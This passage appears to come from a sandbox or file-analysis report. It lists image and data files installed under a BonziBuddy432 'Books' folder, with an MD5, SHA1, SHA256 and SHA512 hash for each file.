| SHA512 | 83536ba1b85b1822544997be4e4ec08e79684a747de5b2c1af3751d75d7dc848e0c743989cd5cc6996d3d8fad918cd7cf6420796d793e77c3261e58d61736107 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page15.jpg
| MD5 | b27f0a5f078782344ee60345bfb30b19 |
| SHA1 | 1e2d4ca315e01e9625a906ddffdd3c336596c432 |
| SHA256 | 2f1b0d7ff847c3987ddcd2eb432c8311bb148de5164b3d96f9f9a267d412079a |
| SHA512 | 58ca3d5336b9a37568bf0dd6fe92fee7a2ba6ecf4d24c66855f0f6dddbc402445e0830686f4566ea73eb1ab2217bdc15353979f4028654b06c8d793b15a87c82 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page14.jpg
| MD5 | 2f0b89fb6286f9cc3d4f698cfe915d3a |
| SHA1 | fb613a71ba544fff7e26be88e8c5316daa99fb0b |
| SHA256 | aa9acde92741388db556b92bb3b3c7052faf78984835d4e05f3ff1bb44c07a3c |
| SHA512 | 742841434414a05d9f5985674268c776123c504b38239f5552dc4e4431254a604e678f5b818570dfd99fafb905fcf052fdcb614952ff9f2befdfaf62453a36af |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page13.jpg
| MD5 | 3b53202999c06a3fc163ca659dfa31de |
| SHA1 | 73fa0053205b67920f7d3e6eef7fe19819603847 |
| SHA256 | 43f4e85f1c60b73fa8252dfc755e38649e8d23ba8a666a83d0cf859b0920f4a1 |
| SHA512 | 916aa4b595a91e13a0b1bddac0f9fedbd131fb024d0a925628fc332239fe053615298f5c18e2e8f4319f4d211c5d679aaa91350f5a781c8d0f18cbb71b3eb58c |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page12.jpg
| MD5 | 75ab958c17806c34e8bff5833816ce56 |
| SHA1 | 45410fa635d296b400da35cfa90e4207e43b084a |
| SHA256 | 2f52d995e111b8c9ac693663a03ca0545861e94c53c7110270d21ff10cd4876b |
| SHA512 | 7947fe6708c45109befcea84019b5f5f84ec1a80137c1895045a38c9151a525df283a47f9f300a386df992492b4f4b12b8a8eb2f0f9c98f8e4a9660723b53c8f |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page10.jpg
| MD5 | 4ae333c66ef5fefe71af37c161ba20cb |
| SHA1 | e0ddf6e7d3535847a507099280cf892df5c56742 |
| SHA256 | 170bdf6aaf4971f4a7f8647aff13e586be00dfcf6f102ddfc218a28b55fc855a |
| SHA512 | 0e515f1e9b461267ca6c48be6874279d1eb575ae829ca2d1b0579d85f10e0249587c62d5063c3ad32416f1c0d66cb9d650f6cc58f27e10cf934430fd1a5fdcd1 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page17.jpg
| MD5 | 7af7a675721f50492623d54c828fddcf |
| SHA1 | bfacc606197c260dfd3d5c60c6eda264cbb1bf3e |
| SHA256 | f08a95be88f1a893ef2989b258ab5699e49978776012789a4bde7056710fd45d |
| SHA512 | f049cff2a6e26b36dbf389b2625c272d35af4110f89789c1659eb6e13fefd057bdd7672209b3d693c7e0c2e31da376f47f892e7661579c333061f13a04613c15 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page17.htm
| MD5 | c03e5da83f9638627aad803869f8e89b |
| SHA1 | a93e0f8abc90d90cb1b1caca5d96ba40a3f896de |
| SHA256 | aca6a7880bd5a465d896f9d639e4a24fd93722d5d1f1b5bd08cde5479df67158 |
| SHA512 | e100cb00036b6d6a25151ce0ceeca21654509ad23a4e89d244ed0692cc83e45bbf6ab6f40e8fdabef8cbd4782236e0f76ed54569d60320b8c8c541958a754962 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page16.jpg
| MD5 | f9de53edeb7b5b9f1e59c41637553cdb |
| SHA1 | 7db31e8a8723f0b940504087371c50cb6953b9c4 |
| SHA256 | e43ef38555b187d9335c77d60ccd215504af10c626f76e4e4967fc690b6fc300 |
| SHA512 | 3a7be8b1f7c99242c381db4e0e6e52f3bcb71ac665d03ac81a93bf8f801335a6018faf7afa0d9d61bec7a481132f2541991e12c2e8d1d7a22eef13af955d9d64 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page2.jpg
| MD5 | 9ea27ce1ba44be65a1756799a906668f |
| SHA1 | a4420b616beb0e2f5166471d655cb7cdfc866e27 |
| SHA256 | b961e9334abeef3ccca67eead97cfbd6eddc857f3d0a411e1978e22a14c27aa1 |
| SHA512 | 660413d845cfdd583555e1b8227849f4605ff369dbf07fb4c7085dae3aae1929db1b265326b7545255ceb52729ac072f83ba1a6a455ab582f5e14080aabba32b |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page3.jpg
| MD5 | 7455ce480dcba6cc511dd8f5dcc7c3f8 |
| SHA1 | 5395a1c85e25f2d33b545ae62f7c2b0d83a5eb03 |
| SHA256 | 7fb6ec96530be3754466c0c7a33c5302b8e38dd9d1b7fdde8c32926e98b4ade6 |
| SHA512 | 2f18c07f01c7bf6c7e8d5f6d77c02509f7da56a120d57e072cf9495dd54b23143c33079c735cfca2b7862d7266456447f4d63837b86310a964cfbca9854830c0 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page4.jpg
| MD5 | 1895fe2f1c64a21f45f4b14ba9f4ca3e |
| SHA1 | da08d8d0ebe04c0c092166df13a1af530a968699 |
| SHA256 | 973f508f18f8c79dc0ae8810940d79ad3b46939ea69afc7c8864897d4cc284b4 |
| SHA512 | e2670a834f6a963b4456bab85fd1194516c05e4bdf8ccb7117e0d0181fcbcc98f3ab8e40ca25df386e25170f728ce72f690c888f8dfbc37151c9dfdb27aa0e26 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page6.jpg
| MD5 | a644394a3090320de4583a807fb71ba4 |
| SHA1 | a54b6542e5fda980ca277c40f24e2c2863b4840e |
| SHA256 | a336ef4a9682e6209a47821007f4bb0ee2afb0e0bb2c3a15ef7d7c9928267aef |
| SHA512 | 322e6d09e9f66d6ad8c81937a4716512bded93ef2ff164bc0beb1f7fabd0866e4ea70cbfb96e1f96b9db3c224bfe444d2369e1145318e28fc5237a7b53f12e56 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb001.gif
| MD5 | b8d3f236077a74be9fc38fac772f1b16 |
| SHA1 | 35f80cf295803363451dcf80c8e1f2b8610785d6 |
| SHA256 | ab33039db90f44dbb3c9967ab157f40805dd68311a441ce5e819c286a3569ddd |
| SHA512 | a88b469bf08324ee4dc5679b4e8c574ef13b76be70612de910df088ab2bbfb177a6a447d622069735108562aaac68dc4ea745577d4c186412bfe4ca08a0feffc |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\book
| MD5 | 5e8dc6605c8cd8a06497a5c22574c3a4 |
| SHA1 | bbff2a4f492241359c14b3a7660153c8c0312463 |
| SHA256 | f4b69039fc2e5827377bfc2e650623f2a1d0959e462c46e8a5502c68991cc641 |
| SHA512 | c137b5d888fbd5de91cdb7ff8baeecc5d3d1c193237a741a9741991e698925a89f7c623c7142a53704b3e0764b9d3ba28a9c93b455583b71d096ffe8e4ad80c6 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\Thumbs.db
| MD5 | 4c436b128feda301505e84bd00e9aace |
| SHA1 | 61a3bac625abb015cc8e1a6397107dcaabd9866e |
| SHA256 | 5d21bbd3ba16464b5ae1327867839f16eb5c161d60d2b5a81bd11a7f8075ffbf |
| SHA512 | 82f0d1a7fe5a4274991eeeedcba120fd16924ca02ee69b2668b29a108a26b6c2ce7c3bee3d289e6281574f57ca4407d56025cd10142b9fb28cdd180d22c4e42e |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page9.jpg
| MD5 | 3e93b462fccd9533c2dab973f717a8a2 |
| SHA1 | b0d6782f035a2d7e3de57a8260275586f3acb852 |
| SHA256 | ff19988ec62abe0e0624c2c5f91994d59c050b32217d680254e6b7796b6e8041 |
| SHA512 | 8622968201a10bd95388426dd6fbc0f41a650a742de4ef07c315555064b3cf135525c2b3506dc0af9a559707567af11ed7ac48694cfc197d54f06bc20dfdbd13 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page8.jpg
| MD5 | a25d8068b62c373ea11dd9112857e80c |
| SHA1 | bdcb6b8a76f4bccb664d93522eeb4dba9d851d2e |
| SHA256 | 544e8923ccef640c4b22499319ae5eff1b7dbae862e0143c40f6e870e9159db2 |
| SHA512 | 7262e93d05b675d85119d85ef8474eb2ec58828c7ce0ada1b754d15af918330ee8858d9c73ef191b5bc7f50c84ae25047a35186ed6685c7c161a4aaa925e7354 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page7.jpg
| MD5 | e77e17381f924ec64b43a4e9cf881cef |
| SHA1 | 22cf59e2f8745f14909e5638f3c2d07a68048f93 |
| SHA256 | 94ab8fff641c839e81860b1c3b5f28cf83ed86b5285fae14f27a112c03845d24 |
| SHA512 | 3da3e6b949e61524481a288012ba71248d787760208907c3d0243239e3fbcd661b579c3b1c0f06a59b9c3de589a612da241433baa4a970b723b9e6c065a0d22a |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page5.jpg
| MD5 | 4ec64b5866f3e42edfbae14d18fec0ef |
| SHA1 | 61a38083b79dc0f56408b692db424ebe424a863f |
| SHA256 | 3048bec5f4781d08360534a96ef7dec46a076cdb83cbfc1ecd84a157cf95f9f3 |
| SHA512 | d1c268fc46aa14dd77eb42211deb620ce07c512f14a30d7a47a2d3ef30db6981f5db413f1cc170bd414a4f252cfa3243ef196b80fde0f04d4efff5582d51780c |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb010.gif
| MD5 | 79a9739cb814396f6cda31b59d3d87bb |
| SHA1 | 2993f8102994a1e238cd48541cad333ed950e88d |
| SHA256 | a16ddc10725a33dd91e617de97cfad7372ee33bbdf195312b70b1d10194b68c7 |
| SHA512 | 2a3e5fb4e102134aaab34d72246b194bba61b630e5e6ef7ced96574a137723cb716eb1d9a7350b4981048fcdb1f496d11fdcfa9edb5007aa06731b8ba09c62ef |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb011.gif
| MD5 | 0420a172f5c3b557a58b9f51ed8c6249 |
| SHA1 | 07c58efb0135071854091f6b3c504b380c971dd9 |
| SHA256 | 741f4194e099e387d5b81753972074c2ec9944b36b442ee90f02f2e05a49e2f0 |
| SHA512 | eea3706f02d068df6e7f6744dc391400950cd635cb966fd224bd7818f140aea02e9389614e18887271cec6a167e699c36d37d2c972724222b9cdf978176ed755 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb009.gif
| MD5 | 62b85bbb9df60349a7c0d8cb06e090e4 |
| SHA1 | 4c231a467127d6cfc1118fd51a0b0220296e255a |
| SHA256 | b5cb2f91a884e832c0eecfffbc4b0f6920a67e0513f3e2ac9130bf6b744ad146 |
| SHA512 | 87e6608e33ec84ce04b20a44c69d1da3ca9f70b7f8542739456b27eb1d8c589f3cf6f22ca1b4777d0135e55f2f7e15cc5306736a5231bac81acb6b5d27f14134 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb008.gif
| MD5 | 517e6ce305c098d358d27e6a606a4e81 |
| SHA1 | 1f90118a88f4593ea4dd748526180f6c69ee617d |
| SHA256 | bdae04f6d7694e1981771c0a76fc555009dae6e56f2f11f8fdff87b2d9dd0797 |
| SHA512 | 044a47bb0115a0b8ec905f4b433acf00866e5faf4349e57aab219c80641d24dcedaed17a170d7bd7eed2e2727daf80fa6eebdfb95791bdabd1dcd2fc80ee9b9a |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb007.gif
| MD5 | 76a8d032c940da779016d3e356401758 |
| SHA1 | 2d60e50d4830e1355863544effef81a153867503 |
| SHA256 | 292ace5abc773d1dbe3db5c3a51d42b11a360e22b17643209b30f5988e437761 |
| SHA512 | 63abe8edd5bb928c4b594aded6da4e82efac7ea7ab086f2e5509391b1e0f5cb3fa6b965ffa4ffd342869d16d02b4c42e8b2c03b6b4a6fead8de581624d8643cc |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb006.gif
| MD5 | 0058727d44f8467d8283250a0b43556e |
| SHA1 | f2b42f0abe25803dd04b87a8512de171034c27be |
| SHA256 | 3f5adbc7bef95ac98d78d9b2e2f25c1b89dd6a14b02ad0c6801de51fe1e48843 |
| SHA512 | 520620f5b52a062d3b37eb866cf731ac0eb876683d929db7b84777c40cd645364c2c715aad50e87951ebf483cd4f45efe00319be1a36d63248b4f4d9c611350b |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb005.gif
| MD5 | 618feaf37b7c85b693ce5ae0ac51a508 |
| SHA1 | d648be18ec2d54a7fe5e808517bea12e19a70fde |
| SHA256 | 0d177be82265d4458b9ab22efc15418128742dcd60488a5bdecd5d334164dedc |
| SHA512 | 9ba910a321de102eb56662acd4236030e64fdd0c026a8a81724b21ab0c0a9b6be7a45117730fbe27eeaa49e22a9ac746d48a8399263c389a338765d8afbdb0c9 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb004.gif
| MD5 | b743e2052f735e7e2f132d2843e53641 |
| SHA1 | edf2545d4279ebcb965aa42523ef4a93cbaf67a3 |
| SHA256 | 9f93891fe6aeeea23b10ae5aa680fd44e408b97ffd9df65cf0434fef1b049af0 |
| SHA512 | 0a16105b057875b105f217b40d8305feb7039f5222d7ecae7c329ab1efb1e4811d4ba111124b4bf5cd40f6bcac843a99444795dd296cd97cc01547cb4cb6cd20 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb003.gif
| MD5 | ec0b47d2d9057ac9d80a3f7f6367de4f |
| SHA1 | 228c3f34695afaf8a3c48e9268cf49d93a94db17 |
| SHA256 | 95cbcbd9c41c128ae03b8536ee229771a8a42e3cbf57faf4697aaabe98c11108 |
| SHA512 | 8a77ee085dc0b5065789757f310f0e4b02b9ffb4e00ac159b6e2bd4e6b6fa634344456b6958998bc6905dae95bfddcd3863dd0504f6daec3dce685e260f6dbbd |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb002.gif
| MD5 | 794dedfb9768a5272ba8793933a3a44d |
| SHA1 | 010de007d8aa5fc21319cc8506b2d20565b29520 |
| SHA256 | d68e785094c2f0016c735ad9ac891e2ea2b0b30b4f30d800446759ba0134b7ac |
| SHA512 | fe2f5809f1cc2d0b3ac310a8b732ce4e014353056005ee6681c13181e3b9017d04f3ee1f8ba39c97dac00e944bbfb684c65de42e2092689d9b0f1c46d15e098b |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb013.gif
| MD5 | 5ff48f51be9c3bed3e81d908c08d7135 |
| SHA1 | 7673287c411d65538b7e60d1e51a92d1acbe4d07 |
| SHA256 | f7eebb0ae58ea8e64160bf2bf8bab0955603c0208c3bfb760d89d01088f042c5 |
| SHA512 | c73ba4a996fa14f3ea9e70f6a1e980c3cb0d0ed57efa8b8d241a99ea2155bfede9d898e6404704ee005c9de130777a4d2c364012398fd839c5966a476ed05d76 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page6.jpg
| MD5 | 5f122bd591cae0eb94e9a6aa30059354 |
| SHA1 | 336bf094f4d7b91883e01c228401ace6533bc187 |
| SHA256 | 30a17bb3c29ce5fd12f6c26ef6d6f6adc019be7ebe858125ef5682a18452186d |
| SHA512 | 6c99e11c8f7bf79114ab5c612cbcce3d7d4b0427e23ab25fd9cff02bed53b08b7b582dcf37845481259fb40a07e9e358ba79fb34f245e1380481737a934a0fda |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page8.jpg
| MD5 | 1cd4763792731c95bd42cdf9ba1d7563 |
| SHA1 | ca99ddbcd46da3f5e8c2b946f1e2f3dc3a93b22c |
| SHA256 | 82bf1e71642ce92294cedfaad9107c10f1a4e1f913fcdd2eaf7b3ce6594101df |
| SHA512 | 35a5821f598cafcf619fb39e09b8d9c8d5ff8631897d57a3c098e5f6c293af693fb1b6d76b8c2bd6f0c9cdda0b9ec6cd31a473ae3b672d42d117fcd3ccc47114 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page3.jpg
| MD5 | 37d227a6ac8680e43df33ff6df5865da |
| SHA1 | 9d6aa22535d62783962c46be95cce2562aad894a |
| SHA256 | 45e619917f11c27e495813f5b3df036cbc1c022f8af9af174c3e606b0950fc0a |
| SHA512 | 993db401842dc987be8baa61b495b69bdce4764aeaebf2e67bd38b0899d00913b20ca1cfe686483dc7dbbfc6c2eae003e97d1b8888e494563df514cd84efa758 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp006.gif
| MD5 | 1b853f839789d4c8a1d47393c06b1f25 |
| SHA1 | c65cab86f2dec503fc5caad740fbd1e81c1c0f3f |
| SHA256 | 1341f0db796d31c7382655362a682a45f00d5160ca149ddb0e13444bb622d9c9 |
| SHA512 | 60f523d36a5251dfa8ce373f046e246543b8b9b44b1beead17d9f2c6fb4ec6fa1cc3557c1342b1f8e90351d69023807ce415afcd92733845298f3e65a9e93c48 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp005.gif
| MD5 | 07d266b7a8c8499c57452f6c50046167 |
| SHA1 | 9e63e66164e18b4e6e151137316d92872ef9d470 |
| SHA256 | f30c86b0ffc248ab421f3d2cdf6dbfa1d7c3504400a8026b8548d8161c4fb081 |
| SHA512 | f3825788af9bb7c20e094f3652fea15b8beed76d78be231477d7ce4a1d13e6162ed451427f62d60c5bc7a434e539932fa7e41b81ef9675a749124110ba766a04 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp004.gif
| MD5 | 501eae9da0aebf0c28706d3e3a831f17 |
| SHA1 | 265db0cdd91a9f77dcb6d0d23884d74adc068ecf |
| SHA256 | e113e023fc04095434a417689f7b436a4e4120427c0f7368beb89e48e6ad6616 |
| SHA512 | 7fa85df145f470b74a2889a06d39c48dda006b0f85d13b8b8da5574ff8ba10d18965b57b5e6fcc577b09ccacc723446faff0a6b0d6a3ead512fb6b4cd8237501 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp003.gif
| MD5 | e964851042773d0809582fde155b22c7 |
| SHA1 | 6d8879362935fb3ab9364feda8fb78d30cc22187 |
| SHA256 | 6078f5e78caa39fa31eaa23ab37e6939003b99e67a0c843335581cb8ec7c824b |
| SHA512 | 887eb03eb987df9c95b17ba93ad044bacae6dc9354eb5b994bfe0cb1a5c0959d360b3437f6eb4c8650176cd4cce9212bc5d5b9ba40359c0c33429391733cfd85 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page20.jpg
| MD5 | b2f5bf2956be990bc111501337664892 |
| SHA1 | 8cbc33dc7081d0160b18b63eda49c7f75d808bcf |
| SHA256 | 5fb9f37c7bcf322d4108fa7b424e54bb40f8dceb6016bf36c18d64003bf32635 |
| SHA512 | cab044b0eebddd9caad310c9770b13be0801f9577b3dad7c23c724eb82a643aecf8df43d2cfa73b1a40746cc320ad9e0075be31faff0417f3d3d5cb0b153b610 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page2.jpg
| MD5 | e9a0531812ba076f8610f9f877c5ed45 |
| SHA1 | 0e92eeea404a592a8a1f3297bddc3033d3c26405 |
| SHA256 | 178e4e26ee97549199d6765c4823cb18783f40b60f78f1b21eceb562d4d4d20d |
| SHA512 | 255056acfe726570e2e9e7f607e9625478b455c8c90271c9e57a2a65b81ff2208d225b9130e7e7642ef04b73224a888a86e0852450b7d8d35f9eb0b95340a9d1 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page19.jpg
| MD5 | e84e01b21f58d34424cdaa9703aaacfc |
| SHA1 | 1e573d629799a349cb02cf83588ced99f66ecb10 |
| SHA256 | 993824753ee0f99b020da4f5f0bda4b14ae0e5b535be14eb24decf398b3ee60b |
| SHA512 | bd079ecf06e5f7b1295110cea78ab63ab8c2d4bd4657f785771e94d57b994b3f80bb191ddb6327c69358a6d432040a4d60c217c83a564b0e2ece1bad763fbd98 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page16.jpg
| MD5 | b6332a8aa3afe8cb87be5284c263fa14 |
| SHA1 | 3b5c9b7750c0c8349d6549ed87e5352289280918 |
| SHA256 | 1a298bc3cc19d27f7f6213b19ecd238c044f631ed3fcd93515437a66ce165ecd |
| SHA512 | 51d051afa48dc9db63cebb1f7d532df6b46c21e296b41400be0d641a78a59770728222193afb349e7851268c6a98d567c94951bf99ecd7dc9620d05ec3b57c47 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page15.jpg
| MD5 | 236ba278a1c1af72d6afc1a0d58f1bbf |
| SHA1 | 2642f8d0f4dfb84128975f53a84406aa9d28b0cf |
| SHA256 | 8a040d1a94ab158f7807ddd2b9aaa0dba7a3e5dccfec6f2bea35673d29017de5 |
| SHA512 | 8af7461e6fc62bae79b9ad5d2a08daf644f20baa1f67f861632dedd65512dd64461a965a43fa529e0848305e3ae03b409f32e6ae8f3c134e262183b9424cde77 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page12.jpg
| MD5 | 01be157e8cd1fe6cb4a7003e78facbc9 |
| SHA1 | 312658eb73982dc1cc9983fece10bfe9a1af3795 |
| SHA256 | f8a8b2816920237db53bcc287a704be0adb43a55971f3fccec2925fd9dd143df |
| SHA512 | e01474d0cce75963799b646860de1bd434d1fb282acfdd38eb262be7f1940974518b09803390d9a8814074fc9c4f58363be999b83c7c867a431b6b24e6f9ba89 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page11.jpg
| MD5 | 581f82609b4884e89379b5b09a53ea14 |
| SHA1 | a76e7bf6bc9f98b54ebbdc33d278e087a6e2bad4 |
| SHA256 | 6dce70dc115740d5d52c0c0e2f1811f3ca457f5a948f207a5a4fccdccccfa365 |
| SHA512 | 8928b9961e4c43e8817a392826585c63d37fe596b1ce8565b1ca935a96502347de85fd9a4ad4a71b1a3e649c61851a340634a0e886439b411d50440d103c2d21 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page10.jpg
| MD5 | 0a1bbb7bead7a0dded90b8e4c1b52342 |
| SHA1 | 49a94562c37da753d7b1f2f74ff9cc11d1c6e541 |
| SHA256 | fbaffdfdd9ff30177d1da6ea5335a57fd31320158a6f659e1d0eaa433dc0df3c |
| SHA512 | 4d6b7087f45ec4a854d84ee41bbbe9f72df8cb370bc303507dbdbe289af4c24e548afaf02e813307251470ba6627455dadf6d8c235ae0f611fb684662e8b7c27 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page1.jpg
| MD5 | bcb18e7091c9a053ffaad154a796e22d |
| SHA1 | 48bb71296fe3d9c41d1423bd90a70602e14cb942 |
| SHA256 | ea87cabd9babb2b7e6791ac98451545e98051f5a3a65dc2021d41b6dc07e6441 |
| SHA512 | feff223b65d7cfadbfb83d2451672aa8d100de20274958f868649d9c92d8b83e43468041cf4ad2c20916edcc82ab1a3bd41740736e979168107fa07ae215fd4f |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page0.jpg
| MD5 | b9a19f739a5abe70ea04ff265d56058d |
| SHA1 | 2d1232622417c444c0256fecae26cdd4d16af125 |
| SHA256 | 6b3f8d11aeebf4d407e67f89e7d81d166c705ce6a8e9850bc9750306729c6f27 |
| SHA512 | 973fe510824480f51603d4ce08af9d7054257ac5b30c6191b378716e8f1c611caf3f81089b321aaa378212677d1ea0e1170c14a1618b647b14959bbeb9ea25aa |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\book
| MD5 | 08e382c1440b50b8e997f0d320f6aad0 |
| SHA1 | 167090cdb5c2a7b4b0fa63a0069b9e494c266a7c |
| SHA256 | 20a1a9d2a70aaa2d33355fb22284cd1ea5408824f93ab1d22f2145a99978402a |
| SHA512 | b0b6714d134b33a78bc766de89dbc01980aeefae397903f96d86e6f7b0fbd81711028623bee8425e0a483f83a801a2fcdc75226da3c46655aa146c8b4fad7929 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp007.gif
| MD5 | 934535182612b7b90377550f6f1a7a49 |
| SHA1 | 7fa2911dc190050ed7059259e3e55fb3ba3a0956 |
| SHA256 | 4e7c34f76e045cf1acdc64071a7fe2d31fec2864d89fdd87e3d79e37dabf30fd |
| SHA512 | 44c2191ba807d53c0cad1a3297f5a114f15d270f80cb8900f7cedb432165d2f741f66c05bb724666a534c917782ce3108273164e3afb13d7c311db9f80d8b9c0 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp002.gif
| MD5 | f1d401ed4184aa59fb75fca83e854fd1 |
| SHA1 | f3742178548022de8b6534817ff90c88e76ee6f6 |
| SHA256 | 92d4e729520977fe8c3cee533c7e259ab5ab67810f36c557c747ca821bc19ca0 |
| SHA512 | e745de3058317d6bad692880afc00d9362619382a71d8ecac79045d3cd8d37aeae91a2a4eb87f3fac6273f75e6f80b1809c2bc9d0a175f5f0dd7fdf5904c3685 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp001.gif
| MD5 | a02aa2b82db348be4484ebe052d448d3 |
| SHA1 | 08c3c37acc48fcfb2a3d2a99ab4f0bca732e3225 |
| SHA256 | 86c740e67613e91aed0a45aefe643b50a3c763761264aab026859f3d1be20f74 |
| SHA512 | bf83bb918b8698d33e12b518f6e0558cacc18bb6c0c55839778ea7f4446a141d2904fe30953ed12c95193c598c9366d4c79795a68f0e10a96b57f03fca42c482 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page9.jpg
| MD5 | 4b4178dcdd926771e2d601f07edf1e55 |
| SHA1 | 3b87b64c316e43c46466b4b5b5d77112a7d6caad |
| SHA256 | c64ce0ded53d511f9a6deba02741d37e5c96e760bc34b294f546931c14d8137a |
| SHA512 | beb93360b8c1e3373d2fdc04afd7fc018033045918cf0587eca94ba65e4361415b29f0c779a86101ef1146072a88e2763552cc20c877b8816841a67d39a0bad9 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page8.jpg
| MD5 | 05de4b67553680cd23c5fa741b6991a0 |
| SHA1 | 13123c66da9c4997142e991adc6bb952cae57713 |
| SHA256 | d8333b0964148b5263793ca0493f40c373a47ea53fb3fd637f1431f44c414b7a |
| SHA512 | 56be6cf453fe8c346d8723d2fc6b3cf5f4d1f22b5fb791b43a4fd9196308fb2163207e58082e5a764d52647d5b13bf846a2b47a1912dbe44f6cfcb3f7f7667a7 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page7.jpg
| MD5 | 60447490b257933c2de36bffbdfe1f7c |
| SHA1 | 375aec1f6c66453b0f0968dd497e668ea1695e31 |
| SHA256 | db7027e0f7d02fe75874ab15de847352099e36bf10650c54c860e4fdd301d418 |
| SHA512 | 1bcfda7d1a75e1f39a16952e99f27bc042601b167caf230eb7bb78f32ca18ad9be7670708f6c5be99839fece81bff4d9a6aceb753335644e49edc77d15464bb3 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page6.jpg
| MD5 | 9e3f913b8b1a04af35cc01c338489f3c |
| SHA1 | dd5b3ca18b3e6d8050a01fdb9aa40058c2625b81 |
| SHA256 | 3c814e53b65c1752145f3248bc0996b9f8733537f9fece5e94aac072d6694364 |
| SHA512 | c67f602b4b76c88bacefdc86cc929a8cc043556e575ea1de8a3ed0481dd42f69fd9175bb39c46632078121a9e21149d7c41b959c4a9c5c0ab6a4fc4f3258871c |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page5.jpg
| MD5 | 91fd681cdd4a73a0c0dc4da4f5c2dbc7 |
| SHA1 | 8c4df7e7b87ba388d065a5732d2a48f2a2b4d5d4 |
| SHA256 | 38be8805a0cf6c7d34cfbb7256242d3e0aea0f3d36185ce6e73c7284bdd87e24 |
| SHA512 | e01db87b87da9b4638ab9ef6a01c1440ca2a2c678563a0ce8eda219989092e43e94dce53778ce240296659a3ccb923a29ea142198281c3245cc5d2ed666f2611 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page4.jpg
| MD5 | fb612fa0ba27a05bdb5f2afacc5c9f74 |
| SHA1 | 8b7ea2536a030b69c0e0ef578dd30897f4078768 |
| SHA256 | d635654cda3fff19815d46e1ea912291adb2c553933709826c1a167b6b77dd53 |
| SHA512 | b86f8ae215a03d8f594197245f11617dbed4ca314eced6f8c7a6502e1313849a5d1ba7e08e001e8514f168d1c8ab7bbc87081c183ebf21608e086140ab74a97a |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page2.jpg
| MD5 | 5ab46cfeccde266448fc395c13c18946 |
| SHA1 | 7af4f9f9872c1c54100db865951bb7d5be5b413e |
| SHA256 | 102bf8d718bc7fd52ed450f81f4810d2af5d9e76d1f42ee983eea70b7222b529 |
| SHA512 | d744ceda60881c071c68602545bfc48c164997196518df9debd24d21c30fcace4e8300bb8e6c7e4dcb3352d3a60db68efae88769d850dc3f1b2afb018c44f9cd |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page16.jpg
